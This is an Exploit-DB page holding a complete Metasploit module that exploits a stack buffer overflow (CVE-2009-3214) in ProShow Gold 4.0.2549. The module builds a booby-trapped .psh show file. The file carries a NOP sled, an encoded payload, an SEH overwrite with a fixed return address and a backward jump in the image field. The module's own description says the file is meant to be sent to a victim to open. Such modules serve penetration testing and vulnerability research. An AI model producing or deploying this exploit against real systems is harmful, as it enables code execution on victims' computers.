ProShow Gold 4.0.2549 - '.psh' Local Stack Buffer Overflow (Metasploit)

EDB-ID:

16655

CVE:

2009-3214

EDB Verified:

Author:

Metasploit

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2010-09-25

Vulnerable App: 
##
# $Id: proshow_cellimage_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.
				An attacker must send the file to victim and the victim must open the file.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 10477 $',
			'References'     =>
				[
					[ 'CVE', '2009-3214' ],
					[ 'OSVDB', '57226' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/9483' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/9519' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# 0x01a614ea # p/p/r @ all.dnt
					[ 'Windows Universal', { 'Offset' => 4036, 'Ret' => 0x101a4cf9 } ], # p/p/r if.dnt
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 20 2009',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.psh']),
			], self.class)
	end

	def exploit

		sploit = make_nops(target['Offset'] - 4 - payload.encoded.length)
		sploit << payload.encoded
		sploit << generate_seh_record(target.ret)

		# note, just in case the arguments get modified, we'll jump back into our buffer...
		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + target['Offset'].to_s).encode_string

		# cause exception hitting the end of the stack
		sploit << rand_text(1000) * 13

		content = "Photodex(R) ProShow(TM) Show File Version=0\r\n"
		content << "cells=1\r\n"
		content << "cell[0].nrOfImages=1\r\n"
		content << "cell[0].images[0].image=" << sploit << "\r\n"

		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(content)

	end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services